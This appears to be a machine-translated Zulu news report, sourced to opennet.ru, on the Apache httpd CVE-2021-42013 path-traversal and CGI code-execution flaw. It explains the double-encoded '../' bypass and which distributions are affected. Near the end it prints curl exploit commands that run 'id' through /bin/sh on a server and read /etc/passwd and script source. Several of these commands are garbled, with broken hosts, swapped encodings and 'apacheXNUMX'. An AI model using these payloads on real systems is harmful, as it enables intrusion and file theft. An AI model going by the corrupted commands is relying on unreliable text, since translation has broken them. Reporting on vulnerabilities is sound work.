Kutholwe i-vector entsha yeseva ye-Apache http, ehlale ingalungiswanga ku-update 2.4.50 futhi ivumela ukufinyelela kumafayela avela ezindaweni ezingaphandle kohlu lwezimpande zesayithi. Ngaphezu kwalokho, abacwaningi bathole indlela evumela, phambi kwezilungiselelo ezithile ezingezona ezijwayelekile, hhayi kuphela ukufunda amafayela wesistimu, kodwa futhi nokukhipha ikhodi yabo kude kuseva. Inkinga ivela kuphela ekukhishweni okungu-2.4.49 naku-2.4.50; izinguqulo zangaphambili azithinteki. Ukuze kuqedwe ubungozi obusha, i-Apache httpd 2.4.51 ikhishwe ngokushesha.
Emgogodleni wayo, inkinga entsha (CVE-2021-42013) ifana ngokuphelele nokuba sengozini kwasekuqaleni (CVE-2021-41773) ku-2.4.49, umehluko kuphela umbhalo ohlukile wezinhlamvu ze-“..”. Ikakhulukazi, ekukhishweni kwe-2.4.50 ikhono lokusebenzisa ukulandelana kwe-"%2e" ukufaka ikhodi yephuzu livinjiwe, kodwa ithuba lokufaka ikhodi kabili liphuthelwe - lapho kucaciswa ukulandelana "%%32%65", iseva yayikhipha ikhodi. ku-"%2e" bese kuba kokuthi ".", i.e. izinhlamvu "../" zokuya kuhla lwemibhalo lwangaphambilini zingafakwa ngekhodi njengokuthi ".%%32%65/".
Ngokuqondene nokuxhaphaza ubungozi ngokwenza ikhodi, lokhu kungenzeka uma i-mod_cgi inikwe amandla futhi kusetshenziswa indlela eyisisekelo lapho ukusetshenziswa kwemibhalo ye-CGI kuvunyelwe khona (isibonelo, uma isiyalelo se-ScriptAlias sinikwe amandla noma ifulegi le-ExecCGI licacisiwe ku- Iziqondiso zezinketho). Imfuneko eyisibopho yokuhlasela okuphumelelayo iwukunikeza ngokusobala ukufinyelela kunkomba enamafayela asebenzisekayo, njengokuthi/umgqomo, noma ukufinyelela impande yesistimu yefayela “/” kuzilungiselelo ze-Apache. Njengoba ukufinyelela okunjalo ngokuvamile kunganikezwa, ukuhlasela kokwenziwa kwekhodi kunokusebenza okuncane kumasistimu wangempela.
Ngesikhathi esifanayo, ukuhlaselwa kokuthola okuqukethwe kwamafayela esistimu okungaqondakali kanye nemibhalo yomthombo yemibhalo yewebhu, efundwa ngumsebenzisi lapho iseva ye-http isebenza ngaphansi kwayo, ihlala ibalulekile. Ukuze wenze lokhu kuhlasela, kwanele ukuba nenkomba esizeni elungiselelwe kusetshenziswa iziqondiso ze-“Alias” noma “ScriptAlias” (I-DocumentRoot ayanele), njengokuthi “cgi-bin”.
Isibonelo sokuxhaphaza esikuvumela ukuthi usebenzise insiza ethi “id” kuseva: curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%% 32%65/.%% 32%65/.%%32%65/bin/sh' —idatha 'echo Content-Type: text/plain; i-echo; id' uid=1(daemon) gid=1(daemon) amaqembu=1(daemon)
Isibonelo sokuxhaphaza esikuvumela ukuthi ubonise okuqukethwe kwe-/etc/passwd kanye nesinye sezikripthi zewebhu (ukuze ukhiphe ikhodi yombhalo, uhla lwemibhalo oluchazwe ngomyalelo othi “Alias”, lapho ukwenziwa kombhalo kungavunyelwe, kufanele kucaciswe. njengohlu lwemibhalo oluyisisekelo): curl 'http://192.168.0.1 .32/cgi-bin/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %65%192.168.0.1/etc/passwd' curl 'http: //32/aliaseddir/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %%65%2/usr/local/apacheXNUMX/cgi -bin/test.cgi'
Inkinga ikakhulukazi ithinta ukusatshalaliswa okuqhubekayo okuqhubekayo okufana ne-Fedora, i-Arch Linux ne-Gentoo, kanye namachweba we-FreeBSD. Amaphakheji emagatsheni azinzile okusabalalisa kweseva elondolozayo i-Debian, RHEL, Ubuntu kanye ne-SUSE awathintwa ukuba sengozini. Inkinga ayenzeki uma ukufinyelela ezinhlwini zemibhalo kwenqatshwa ngokusobala kusetshenziswa isilungiselelo esithi "funa konke kunqatshelwe".
Source: opennet.ru